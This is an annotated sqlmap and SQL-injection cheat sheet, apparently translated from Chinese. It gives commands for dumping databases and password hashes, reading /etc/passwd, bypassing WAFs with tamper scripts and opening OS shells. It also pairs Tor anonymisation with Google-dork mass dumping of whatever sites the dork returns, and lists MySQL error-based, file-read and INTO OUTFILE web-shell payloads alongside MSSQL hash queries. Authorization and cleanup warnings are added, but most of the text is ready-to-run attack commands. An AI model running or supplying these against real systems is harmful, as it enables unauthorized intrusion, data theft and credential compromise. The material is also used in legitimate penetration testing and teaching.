# Basic usage (only run sqlmap against targets you are authorized to test: it is noisy, and the higher --risk/--level settings used below can modify data)
./sqlmap.py -u "inject address" --dbs // enumerate databases
./sqlmap.py -u "inject address" --current-db // current database
./sqlmap.py -u "inject address" --users // enumerate database users
./sqlmap.py -u "inject address" --current-user // current user
./sqlmap.py -u "inject address" --tables -D "database" // enumerate the table names of the database
./sqlmap.py -u "inject address" --columns -T "table name" -D "database" // get the column names of the table
./sqlmap.py -u "inject address" --dump -C "field,field" -T "table name" -D "database" // dump the data of the listed columns (the original calls this "脱裤", i.e. pulling the table)
# Bypass WAF: --tamper=apostrophemask,apostrophenullencode,chardoubleencode,escapequotes,overlongutf8,space2plus,symboliclogical,base64encode,unionalltounion,xforwardedfor,multiplespaces,nonrecursivereplacement
#   (each tamper script is written for specific DBMSs/WAF behaviours and several of these rewrite the same characters; chaining them all at once tends to break payloads, so read each script's docstring and combine only what the target needs)
# Cookie injection: sqlmap.py -u URL --cookie "parameter" --tables --level 2   // cookie parameters are only tested at --level 2 or higher
# POST login box injection: sqlmap.py -r FILE.TXT -p username --tables --forms -v 3 --dbs --batch --os "Windows" --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py
Bypass WAF: sqlmap.py -u "inject address" -v 3 --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py
sqlmap.py -u URL -v 3 --dbms "MySQL" --tamper "space2morehash.py" --referer "http://www.google.com" --user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
sqlmap.py -r FILE.TXT -p username --tables --forms -v 3 --dbs --batch --os "Windows" --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py
# Submit using the POST method
sqlmap -u "http://192.168.1.1/sqlmap/oracle/post_int.php" --method POST --data "id=1"
sqlmap -u "https://xxxxx//search.aspx" --forms --batch --crawl=10 --dbms=MSSQL --dbs --current-db --technique=BEUST --risk=3 --level=3   // --risk=3 adds OR-based tests that can alter data if the injectable statement is an UPDATE/DELETE; --crawl=10 follows links ten levels deep, so make sure everything it reaches is in scope
# Read the database version, current user, current database (URLs are quoted so the shell does not interpret ? and &)
sqlmap.py -u "http://www.xxxxx.com/test.php?p=2" -f -b --current-user --current-db -v 1
# Determine the current database user
permissions
sqlmap.py -u "http://www.xxxxx.com/test.php?p=2" --privileges -U username -v 1
sqlmap.py -u "http://www.xxxxx.com/test.php?p=2" --is-dba -U username -v 1
# Read the password hashes of all database users, or of a specified database user (sqlmap offers to crack them with a dictionary; handle the hashes as credential material)
sqlmap.py -u "http://www.xxxxx.com/test.php?p=2" --users --passwords -v 2
sqlmap.py -u "http://www.xxxxx.com/test.php?p=2" --passwords -U root -v 2
# Get all the databases
sqlmap.py -u "http://www.xxxxx.com/test.php?p=2" --dbs -v 2
# Get all the tables in the specified database
sqlmap.py -u "http://www.xxxxx.com/test.php?p=2" --tables -D mysql -v 2
# Get the columns of the specified table in the specified database
sqlmap.py -u "http://www.xxxxx.com/test.php?p=2" --columns -D mysql -T users -v 2
# Get the data of the specified columns in the specified table in the specified database
sqlmap.py -u "http://www.xxxxx.com/test.php?p=2" --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2   // -s names the session file that stores everything retrieved and lets the run resume
# --file-read: read a file from the database server (on MySQL this needs the FILE privilege and a path allowed by secure_file_priv)
sqlmap.py -u "http://www.xxxxx.com/test.php?p=2" --file-read "/etc/passwd" -v 2
# --file-write: upload a local file to the database server (same privilege requirements; this plants a file on the target, so record it and remove it when the engagement ends)
sqlmap.py -u "http://www.xxxxx.com/test.php?p=2" --file-write /localhost/mm.php --file-dest /var/www/html/xx.php -v 2
# union: range of columns to test for UNION query injection
sqlmap.py -u "http://url/news?id=1" --union-cols
# injection
# Get the current user name
sqlmap.py -u "http://url/news?id=1" --current-user
# Get the current database name
sqlmap.py -u "http://www.xxoo.com/news?id=1" --current-db
# List tables
sqlmap.py -u "http://www.xxoo.com/news?id=1" --tables -D "db_name"
# List columns
sqlmap.py -u "http://url/news?id=1" --columns -T "tablename" -D "db_name" -v 0
# Get the column contents
sqlmap.py -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0
# --smart: only run thorough tests where positive heuristics are found; --level sets the test level
sqlmap.py -u "http://url/news?id=1" --smart --level 3 --users
# --dbms: specify the database type
sqlmap.py -u "http://url/news?id=1" --dbms "Mysql" --users
# list database users
sqlmap.py -u "http://url/news?id=1" --users
#
Instructions for use:
Injection point: www.xxx.com/user.jsp?id=1
1. Determine whether an injection exists
sqlmap.py -u "www.xxx.com/user.jsp?id=1"
2. Get the databases (not needed for an Access database)
sqlmap.py -u "www.xxx.com/user.jsp?id=1" --dbs
3. View the database used by the current application (not needed for an Access database)
sqlmap.py -u "www.xxx.com/user.jsp?id=1" --current-db
4. List all the tables of the specified database
sqlmap.py -u "www.xxx.com/user.jsp?id=1" --tables -D database
5. Read the column names of the specified table
sqlmap.py -u "www.xxx.com/user.jsp?id=1" --columns -T "datasheet" -D "database"
6. Read the contents of the specified columns
sqlmap.py -u "www.xxx.com/user.jsp?id=1" --dump -C "field" -T "datasheet" -D "database"
After reading the data, sqlmap writes it to its output directory (output/ under the sqlmap directory in older releases, ~/.local/share/sqlmap/output in current ones) as "<table>.csv". Those dumps contain the target's real data, so protect and delete them as carefully as the original.
1. Test injection point permissions
sqlmap.py -u "URL" --privileges //Test permissions for all users
sqlmap.py -u "URL" --privileges -U sa //Test the sa user's rights
2. Execute a shell command
sqlmap.py -u "URL" --os-cmd="net user" //Execute the net user command
sqlmap.py -u "URL" --os-shell //Interactive system shell. Needs DBA-level rights; on MySQL/PostgreSQL sqlmap uploads a stager and backdoor into a writable web directory, on MSSQL it goes through xp_cmdshell. Note what gets written so it can be cleaned up afterwards.
3. Get the current database name
sqlmap.py -u "URL" --current-db
4. Execute SQL statements
sqlmap.py -u "URL" --sql-shell //Returns an interactive SQL shell that can execute SQL statements
sqlmap.py -u "URL" --sql-query="sql"
5. POST submission method
sqlmap.py -u "URL" --data "POST parameters"
6. Verbosity levels
sqlmap.py -u "URL" --dbs -v 1
The -v parameter has the following seven levels:
0: only show Python tracebacks, errors and critical messages;
1: also show information and warning messages;
2: also show debug messages;
3: also show the injected payloads;
4: also show HTTP requests;
5: also show HTTP response headers;
6: also show the content of the HTTP response page.
7.
Inject an HTTP request
sqlmap.py -r head.txt --dbs //head.txt holds a raw HTTP request, e.g. captured with Burp Suite (the request file usually contains a live session cookie, so treat it as a credential)
8. Connect directly to the database
sqlmap.py -d "mysql://admin:admin@192.168.1.1:3306/testdb" --dbs   // credentials on the command line end up in shell history and in the process list
9. Injection level
sqlmap.py -u "URL" --level 3
10. Inject at a specified position marked with * (usually used for pseudo-static URLs)
sqlmap.py -u "http://www.xxx.com/id/2*.html" --dbs
11. Use a sqlmap tamper script
sqlmap.py -u "URL" --tamper "space2morehash.py"
sqlmap tamper scripts:
Script name: apostrophemask.py
Role: replace the apostrophe with its UTF-8 full-width counterpart
Example: ("1 AND '1'='1") becomes '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
Applies to: all DBMSs
Script name: equaltolike.py
Role: replace the equals sign with LIKE
Example: SELECT * FROM users WHERE id=1 becomes SELECT * FROM users WHERE id LIKE 1
Tested against: Microsoft SQL Server 2005; MySQL 4, 5.0 and 5.5
## Common sqlmap parameters and descriptions
-b get the banner
-p specify the parameter(s) to test
-g get target URLs from Google, e.g. -g "inurl:aspx?id=" (this fires payloads at arbitrary third-party sites; only use it within an authorized scope)
--gpage=GOOGLEPAGE Google dork result page number
--union-check whether UNION injection is supported
--union-cols range of columns to test for UNION query injection
--union-test test UNION statements
--union-use use UNION injection
--proxy proxy the injection
--threads use multithreading
--user-agent custom User-Agent
--referer=REFERER HTTP Referer header
--proxy=PROXY use a proxy
--string specify a keyword
--tor route traffic through the Tor network
--predict-output predict common query output
--keep-alive use a persistent HTTP(S) connection
--eval=EVALCODE evaluate Python code before each request (e.g. to recompute a hash or token parameter)
-a, --all retrieve everything
--hostname retrieve the DBMS server hostname
--is-dba check whether the current user is DBA
--users enumerate all users
--passwords enumerate all users' password hashes
--roles enumerate all users' roles
--schema enumerate the DBMS schema
--count retrieve the number of entries
--dump dump DBMS database table entries; name the column(s) with -C
--dump-all dump entries of all DBMS database tables
--search search for a column,
table, or database name
--exclude-sysdbs exclude system databases when enumerating tables
--sql-query=query execute a SQL statement
--file-read=RFILE read a file
--file-write=WFILE local file to write
--file-dest=DFILE absolute destination path on the target for the write
--reg-read read a Windows registry key value
--reg-add add a Windows registry key value
--reg-del delete a Windows registry key value
--reg-key=REGKEY Windows registry key
--reg-value=REGVAL Windows registry key value name
--reg-data=REGDATA Windows registry key value data
--reg-type=REGTYPE Windows registry key value type
--dump-format=DUMP dump data format (CSV (default), HTML or SQLITE)
--hex use hexadecimal data retrieval
--output-dir=ODIR custom output directory path
--update update sqlmap
--purge-output securely wipe all content of the output directory (do this when the engagement ends; the directory holds dumped data and session files)
--check-waf heuristically check for WAF/IPS/IDS protection
--os-pwn out-of-band shell (via Metasploit)
--cookie=COOKIE specify the HTTP Cookie header; needed when the injection point is behind a login
--random-agent use a randomly selected User-Agent
--tamper=TAMPER apply the given tamper script(s) to payloads
--level test level (1-5), default is 1
--auth-type Digest --auth-cred "testuser:testpass"
--auth-type Basic --auth-cred "testuser:testpass"
--dbms "PostgreSQL" * MySQL * Oracle * PostgreSQL * Microsoft SQL Server
--os "Windows" * Linux * Windows
# Information gathering
sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users # --dbms: specify the database type
sqlmap -u "http://url/news?id=1" --users # list database users
sqlmap -u "http://url/news?id=1" --dbs # list databases
sqlmap -u "http://url/news?id=1" --passwords # database user password hashes
sqlmap -u "http://url/news?id=1" --passwords -U root -v 0 # list the password hash of the specified database user
sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 # dump the specified columns, rows 1 to 20
sqlmap -u "http://url/news?id=1" --dump-all -v 0 # dump all tables in all databases
sqlmap -u "http://url/news?id=1" --privileges # view permissions
sqlmap -u
"http://url/news?id=1" --privileges -U root # view the specified user's permissions
sqlmap -u "http://url/news?id=1" --is-dba -v 1 # is the current user a database administrator?
sqlmap -u "http://url/news?id=1" --roles # enumerate database user roles
sqlmap -u "http://url/news?id=1" --udf-inject # inject user-defined functions (code execution as the DBMS process user; needs file-write rights and leaves a shared library plus functions on the target, so run --cleanup afterwards)
sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 # dump all tables of the non-system databases
sqlmap -u "http://url/news?id=1" --union-cols # column range for UNION query injection
sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" # cookie injection
sqlmap -u "http://url/news?id=1" -b # get banner information
sqlmap -u "http://url/news?id=1" --data "id=3" # POST injection
sqlmap -u "http://url/news?id=1" -v 1 -f # fingerprint the database type
sqlmap -u "http://url/news?id=1" --proxy "http://127.0.0.1:8118" # inject through a proxy (e.g. Burp or Privoxy)
sqlmap -u "http://url/news?id=1" --string "STRING_ON_TRUE_PAGE" # specify the keyword that marks a TRUE response
sqlmap -u "http://url/news?id=1" --sql-shell # interactive SQL shell
sqlmap -u "http://url/news?id=1" --file-read /etc/passwd # read a file (the option is --file-read; a bare --file is not a valid switch)
sqlmap -u "http://url/news?id=1" --os-cmd=whoami # execute a system command
sqlmap -u "http://url/news?id=1" --os-shell # interactive system shell
sqlmap -u "http://url/news?id=1" --os-pwn # out-of-band shell
sqlmap -u "http://url/news?id=1" --reg-read # read the Windows registry
sqlmap -u "http://url/news?id=1" --dbs -s "sqlmap.sqlite" # save progress: -s names the session file (the original used -o "sqlmap.log", but in current sqlmap -o turns on the optimization switches and is not an output file)
sqlmap -u "http://url/news?id=1" --dbs -s "sqlmap.sqlite" # restore saved progress: re-running with the same session file resumes automatically (the old --resume switch is gone; --flush-session starts over)
# Fingerprinting the remote system and its database
sqlmap.py -u "http://localhost/weak.php?id=10" -b
Output:
[11:19:51] [INFO] the back-end DBMS is MySQL
[11:19:51] [INFO] fetching banner
[11:19:51] [WARNING] running in a single-thread mode.
Please consider usage of option '--threads' for faster data retrieval
[11:19:51] [INFO] retrieved: 5.1.61
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
banner: '5.1.61'
# fetch the list of users and roles
sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10
database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
database management system users password hashes:
[*] [1]: password hash: NULL
[*] root [2]: password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 password hash: NULL
(the anonymous ''@'...' accounts and the NULL hashes are findings in their own right: they most likely allow password-less logins)
# Reading a system file
sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10
# Run an arbitrary SQL command
sqlmap.py -u "http://localhost/weak.php?id=10" --sql-query="select now();"
output:
[11:50:22] [INFO] retrieved: 2013-04-15 11:51:10
select now();: '2013-04-15 11:51:10'
# Interactive shell
sqlmap.py -u "http://www.xxx.com" --os-cmd "ipconfig"
sqlmap.py -u "http://www.xxx.com" --os-shell
sqlmap.py -u "http://www.xxx.com" --os-pwn
sqlmap.py -u "http://www.xxx.com" --sql-shell
# Form SQL injection:
./sqlmap.py -u "http://www.xxx.com" --forms --batch --crawl=10 --data "tfUName=1&UPass=1" --cookie "id=9" -p tfUPass
# WAF bypass
./sqlmap.py -u "http://www.xxx.com" --forms --batch --crawl=10 --data "tfUName=1&UPass=1" --cookie "id=9" -p tfUPass --tamper="space2hash.py" -v 3 --dbs
# Tor with sqlmap:
apt-get install -y tor
Start the Tor service: sudo service tor start
sqlmap.py --tor --tor-type=SOCKS5 --check-tor -g "inurl:.php?id=1" --random-agent --dump-all --batch --time-sec=15
(--check-tor makes sqlmap verify that traffic really exits through Tor before it sends payloads; without it a misconfigured proxy silently leaks your real address. Note that -g sprays injection attempts at whatever Google returns, which is unauthorized testing of third parties unless every result is in scope. The larger --time-sec is presumably there because Tor latency would otherwise yield false time-based positives.)
The -v parameter sets the level of detail: use it to watch how sqlmap probes a point and reads data.
## There are seven levels; the default is 1:
0. only show Python errors and critical messages.
1.
also show basic information and warnings (default).
2. also show debug information.
3. also show the injected payloads.
4. also show HTTP requests.
5. also show HTTP response headers.
6. also show the HTTP response page.
# Dumping data with sqlmap (the original calls this "脱裤", i.e. pulling the whole table or database)
The --dump parameter dumps table contents; use --dump-all to dump everything.
Specified columns of a specified table:
sqlmap -u "http://xxx/index.php?id=1" --dump -D DBName -T TableName -C "id,username,password"
Dump the entire database:
sqlmap -u "http://xxx/index.php?id=1" -D DBName --dump-all
# Advanced usage
-p name: with several parameters such as index.php?n_id=1&name=2&data=2020, -p name tells sqlmap to inject only into the name parameter
sqlmap -g "google dork" --dump-all --batch # take injection points from a Google dork and automatically dump every field; requires google.com to be reachable (and hits every site the dork returns, so keep it within an authorized scope)
--technique: specify the injection technique(s) to use; without it all techniques are tested by default
• B: boolean-based blind
• E: error-based
• U: UNION query-based
• S: stacked queries
• T: time-based blind
--tamper bypasses the web application firewall (WAF); the original notes that sqlmap encodes with char() by default. The tamper scripts live in the sqlmap-dev\tamper directory
sqlmap -u "http://target/news?id=1" --smart --level 3 --users # --smart: intelligent test level execution (the original cites a real third-party host here; a placeholder is used instead)
Attack example:
sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="xxx" --string="Surname" --dbms=mysql --users --passwords
# Request
These options can be used to specify how to connect to the target URL:
--data=DATA data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
--cookie-urlencode URL-encode generated cookie injections
--drop-set-cookie ignore the Set-Cookie header of the response
--user-agent=AGENT specify the HTTP User-Agent header
--random-agent use a randomly
selected HTTP User-Agent header
--referer=REFERER specify the HTTP Referer header
--headers=HEADERS extra HTTP headers, newline-separated
--auth-type=ATYPE HTTP authentication type (Basic, Digest or NTLM)
--auth-cred=ACRED HTTP authentication credentials (username:password)
--auth-cert=ACERT HTTP client certificate (key_file,cert_file)
--proxy=PROXY connect to the target URL through an HTTP proxy
--proxy-cred=PCRED HTTP proxy authentication credentials (username:password)
--ignore-proxy ignore the system default HTTP proxy
--delay=DELAY delay in seconds between each HTTP request
--timeout=TIMEOUT seconds to wait before the connection times out (default 30)
--retries=RETRIES number of retries when the connection times out (default 3)
--scope=SCOPE regular expression to filter targets from the provided proxy log
--safe-url=SAFURL a URL that sqlmap visits periodically during testing (keeps the session alive and avoids being locked out by the application)
--safe-freq=SAFREQ number of test requests between two visits to the safe URL
# Enumeration
These options can be used to enumerate information about the back-end database management system, its structure and the data in its tables. You can also run your own SQL statements.
-b, --banner Retrieve the identity of the database management system --current-user retrieves the current user of the database management system --current-db retrieves the current database of the database management system --is-dba Detects whether the DBMS current user is DBA --users enumerates database management system users --passwords enumerates database management system user password hashes --privileges enumerates permissions for database management system users --roles enumerates the roles of database management system users --dbs enumerates the database management system database --tables enumerates tables in the DBMS database --columns enumerates DBMS database table columns --dump dumps the entries in the database of the database management system --dump-all dumps entries in all DBMS database tables --search search column(s), table(s) and/or database name(s) -D DB The name of the database to be enumerated -T TBL Database table to be enumerated -C COL Database column to be enumerated -U USER database user used for enumeration --exclude-sysdbs Exclude system database when enumerating tables --start=LIMITSTART The first query output goes into the search --stop=LIMITSTOP The output of the last query goes into the search --first=FIRSTCHAR Character search for the first query output word --last=LASTCHAR Output word character retrieval for the last query --sql-query=QUERY SQL statement to execute --sql-shell prompts interactive SQL shell # Optimization These options can be used to optimize the performance of SqlMap. 
-o turn on all optimization switches
--predict-output predict common query output
--keep-alive use a persistent HTTP(S) connection
--null-connection retrieve the page length without the actual HTTP response body
--threads=THREADS maximum number of concurrent HTTP(S) requests (default 1)
-p TESTPARAMETER testable parameter(s)
--dbms=DBMS force the back-end DBMS to this value
--os=OS force the back-end DBMS operating system to this value
--prefix=PREFIX injection payload prefix string
--suffix=SUFFIX injection payload suffix string
--tamper=TAMPER tamper injected data with the given script(s)
# Detection
These options can be used to specify how to parse and compare the contents of HTTP response pages during blind SQL injection.
--level=LEVEL level of tests to perform (1-5, default 1)
--risk=RISK risk of tests to perform (0-3 in old releases, 1-3 now; default 1). Risk 2 adds heavy-query time-based tests and risk 3 adds OR-based boolean tests, which can modify or delete rows when the injectable statement is an UPDATE or DELETE: get explicit approval before using it against production data
--string=STRING string to match when the query is evaluated to True
--regexp=REGEXP regular expression to match when the query is evaluated to True
--text-only compare pages based only on their textual content
# Techniques
These options can be used to tweak the testing of specific SQL injection techniques.
--technique=TECH SQL injection techniques to test for (default BEUST)
--time-sec=TIMESEC seconds to delay the DBMS response (default 5)
--union-cols=UCOLS range of columns to test for UNION query injection
--union-char=UCHAR character used to brute-force the number of columns
# Fingerprint
-f, --fingerprint perform an extensive DBMS version fingerprint
# Brute force
These options can be used to run brute-force checks.
--common-tables check for the existence of common tables
--common-columns check for the existence of common columns
# User-defined function injection
These options can be used to create custom user-defined functions.
--udf-inject inject custom user-defined functions
--shared-lib=SHLIB local path of the shared library
# File system access
These options can be used to access the underlying file system of the back-end database management system.
--file-read=RFILE read a file from the back-end DBMS file system
--file-write=WFILE write a local file to the back-end DBMS file system
--file-dest=DFILE absolute path on the back-end DBMS file system to write to
# Operating system access
These options can be used to access the underlying operating system of the back-end database management system.
--os-shell prompt for an interactive operating system shell
--os-pwn prompt for an OOB shell, Meterpreter or VNC
--os-smbrelay one-click prompt for an OOB shell, Meterpreter or VNC via SMB relay
--os-bof stored procedure buffer overflow exploitation (a failed overflow can crash the database service; do not run it against production without agreement)
--priv-esc database process user privilege escalation
--msf-path=MSFPATH local path where Metasploit Framework is installed
--tmp-path=TMPPATH remote absolute path of the temporary files directory
# Windows registry access
These options can be used to access the back-end database management system Windows registry.
--reg-read read a Windows registry key value
--reg-add write a Windows registry key value data
--reg-del delete a Windows registry key value
--reg-key=REGKEY Windows registry key
--reg-value=REGVAL Windows registry key value
--reg-data=REGDATA Windows registry key value data
--reg-type=REGTYPE Windows registry key value type
# General
These options can be used to set some general working parameters.
-t TRAFFICFILE log all HTTP traffic into a text file (it will contain session cookies, any credentials and retrieved data; protect it like the dumps)
-s SESSIONFILE save and restore all data retrieved on a session file
--flush-session flush the session file for the current target
--fresh-queries ignore query results stored in the session file
--eta display for each output the estimated time of arrival
--update update sqlmap
--save file save options to an INI configuration file
--batch never ask for user input, use the default behaviour
# Miscellaneous
--beep beep on question and/or when an injection is found
--check-payload offline WAF/IPS/IDS payload detection testing
--cleanup clean up the DBMS from sqlmap-specific UDFs and tables (run it after any --udf-inject or --os-* takeover; the help text only promises UDFs and tables, so check the web root yourself for any stager/backdoor sqlmap uploaded)
--forms parse and test forms on the target URL
--gpage=GOOGLEPAGE use Google dork results from the specified page number
--page-rank display page rank (PR) for Google dork results
--parse-errors parse and display DBMS error messages from responses
--replicate replicate dumped data into a sqlite3 database
--tor use the default Tor (Vidalia/Privoxy/Polipo) proxy address
--wizard simple wizard interface for beginner users
# Partial usage of sqlmap
1) determine whether the current user is dba
python sqlmap.py -u "url" --is-dba -v 1
2) --users: list database management system users
python sqlmap.py -u "url" --users -v 0
3) --passwords: database user password (hashes)
python sqlmap.py -u "url" --passwords -v 0
python sqlmap.py -u "url" --passwords -U sa -v 0
4) view user permissions
python sqlmap.py -u "url" --privileges -v 0
python sqlmap.py -u "url" --privileges -U postgres -v 0
5) --dbs: list the available databases
python sqlmap.py -u "url" --dbs -v 0
6) --tables: list the tables of a database
python sqlmap.py -u "url" --tables -D "information_schema"   -D: specify the database name
7) --columns: list the column names of a table
python sqlmap.py -u "url" --columns -T "user" -D "mysql" -v 1   -T: specify the table name, -D: specify the database name
8) --dump: list the contents of the specified columns of a table
python sqlmap.py -u "url" --dump -T "users" -D "testdb"   -C: specify the columns; --start/--stop restrict the dump to a row range, e.g. rows 2 to 4:
python sqlmap.
py -u "url" --dump -T "users" -D "testdb" --start 2 --stop 4 -v 0
9) --dump-all: list all databases and all table contents
python sqlmap.py -u "url" --dump-all -v 0
only list the contents of the user-created databases and tables (skip system databases):
python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0
10) --file-read: read file contents [via the load_file() function on MySQL, so the FILE privilege and secure_file_priv apply]
python sqlmap.py -u "url" --file-read /etc/passwd   (the original had "--file /etc/password"; the option is --file-read and the file is /etc/passwd)
11) execute SQL
python sqlmap.py -u "url" --sql-shell
12) -p: specify parameters
python sqlmap.py -u "url" -v 1 -p "id"   -p can take several parameters: -p "cat,id"
13) POST submission
python sqlmap.py -u "url" --method POST --data "id=1"
14) cookie submission
python sqlmap.py -u "url" --cookie "id=1" -v 1   the cookie value can be captured with TamperData or any intercepting proxy
15) Referer trick
python sqlmap.py -u "url" --referer "url" -v 3
16) use a custom User-Agent or a user-agents list
python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
python sqlmap.py -u "url" -v 1 -a "./txt/user-agents.txt"   (old-release syntax; current sqlmap uses --random-agent)
17) use multithreading to speed up retrieval
python sqlmap.py -u "url" -v 1 --current-user --threads 3
18) specify the database and bypass sqlmap's automatic detection
python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL"
19) specify the operating system and bypass sqlmap's automatic detection
python sqlmap.py -u "url" -v 2 --os "Windows"
20) --prefix and --suffix: custom payload (the original wrote --postfix; the option is --suffix)
python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --suffix "and 'test'='test"
21) UNION injection test (old-release options)
python sqlmap.py -u "url" --union-test -v 1
22) with ORDER BY
python sqlmap.py -u "url" --union-test --union-tech orderby -v 1
23) python sqlmap.py -u "url" -v 1 --union-use --banner
24) python sqlmap.py -u "url" -v 5 --union-use --current-user
25) python sqlmap.py -u "url" -v 1 --union-use --dbs
// Execute SQL statements (the original cites a real third-party domain here; a placeholder is used instead)
sqlmap.py -u "http://target.example/hotelinchina.asp?cityid=2&m=1" -v 1 --sql-shell
// More detailed information
sqlmap.py -u "http://target.example/hotelinchina.asp?cityid=2&m=1" -v 5
# MySQL commands:
SELECT database()
SELECT version()
SELECT user()
-- datadir() is not a MySQL function; the data directory is a system variable:
SELECT @@datadir
SELECT user FROM mysql.user
SELECT schema_name FROM information_schema.schemata
SELECT @@hostname
UNION ALL SELECT LOAD_FILE('/etc/passwd') -- (keep the space after "--": MySQL only treats "-- " as a comment; LOAD_FILE needs the FILE privilege and a path permitted by secure_file_priv)
select @@basedir
select system_user()
select current_user()
select user()
select @@version_compile_os
select now()
DESC <table name>  or  SHOW COLUMNS FROM <table name>
select * from users union select 1,load_file('/etc/passwd'),3;
select * from users union select 1,load_file(0x2F6574632F706173737764),3;   -- the hex literal is '/etc/passwd'; it avoids quotes in the payload
select '' into outfile '/var/www/html/xxx.php';
select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/xxx.php';   -- writes "<?php phpinfo(); ?>"; needs the FILE privilege, secure_file_priv allowing the web root and a directory writable by the mysqld user, and it plants a file on the target that must be removed afterwards
# Get the version number
SELECT @@version
SELECT version()
# host name, IP address
SELECT @@hostname;
# username and password hashes
SELECT host, user, password FROM mysql.user;   -- from MySQL 5.7 the column is authentication_string
# username
SELECT user();
SELECT system_user();
SELECT user FROM mysql.user;
SELECT current_user;
SELECT distinct(db) FROM mysql.db
SELECT schema_name FROM information_schema.schemata;
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema = 'customers_db'
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema';
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE column_name LIKE 'password' OR column_name LIKE 'credit_card'
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;
SELECT load_file('databasename/tablename.MYD')   -- path relative to the data directory, e.g. tables_priv.MYD host.MYD help_keyword.MYD columns_priv.MYD db.MYD (MyISAM tables only)
# User rights related
# enumerate user
permissions
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
# enumerate user permissions
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user;   -- File_priv is the flag that gates LOAD_FILE / INTO OUTFILE
# enumerate database permissions
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges;
# list column privileges
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges;
# List databases
# current database
SELECT database();
# all databases (MySQL >= 5.0, which introduced information_schema)
SELECT schema_name FROM information_schema.schemata;
# List tables
# common
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
# find the table name from a column name
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
# list column names
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
# retrieve a single row
SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 0;
SELECT host,user FROM user ORDER BY host LIMIT 0,1;
# Error-based injection (substitute the subquery you want to extract for "SQL statement")
And (select 1 from (select count(*), concat((SQL statement), floor(rand(0)*2))x from information_schema.tables group by x)a);
And (select count(*) from (select 1 union select null union select !1)x group by concat((SQL statement), floor(rand(0)*2)));
And extractvalue(1, concat(0x5c, (SQL statement)));
And 1=(updatexml(1,concat(0x5e24,(SQL statement), 0x5e24),1));
# Time-based (delay) injection
SELECT BENCHMARK(1000000,MD5('A'));   -- burns CPU on the database server; prefer SLEEP() where it is available
SELECT SLEEP(5);
# File reading and writing
# read a file (requires the FILE privilege; secure_file_priv restricts the readable path)
UNION SELECT
LOAD_FILE('/etc/passwd')
# write a file (requires the FILE privilege; DUMPFILE writes a single row with no escaping or terminators, which is what binary payloads need)
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'
# write a file (requires the FILE privilege)
SELECT * FROM mytable INTO outfile '/tmp/somefile'
# Conditionals and string functions
# IF
SELECT if(1=1,'foo','bar'); # returns foo
# CASE WHEN
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
# char function, convert numbers to characters
SELECT char(65);
# ascii function, convert characters to numbers
SELECT ascii('A');
# CONCAT function, join strings together
SELECT CONCAT('A','B');
# string in hexadecimal notation
SELECT 0x414243;
# substring/substr function
SELECT substr('abcd', 3, 1);
# length function
SELECT length('abcd');
# MSSQL
# Database version
SELECT @@version
# host name, IP address
SELECT HOST_NAME()
# Current user
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
# List all users
SELECT name FROM master..syslogins
# List password hashes (MSSQL 2005+; password_hash is only returned to sufficiently privileged logins)
SELECT name, password_hash FROM master.sys.sql_logins --*
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins --*
# Current database
SELECT DB_NAME()
# enumerate databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- where N = 0, 1, 2, ...
# Permissions
# check the current user's server roles
SELECT is_srvrolemember('sysadmin');
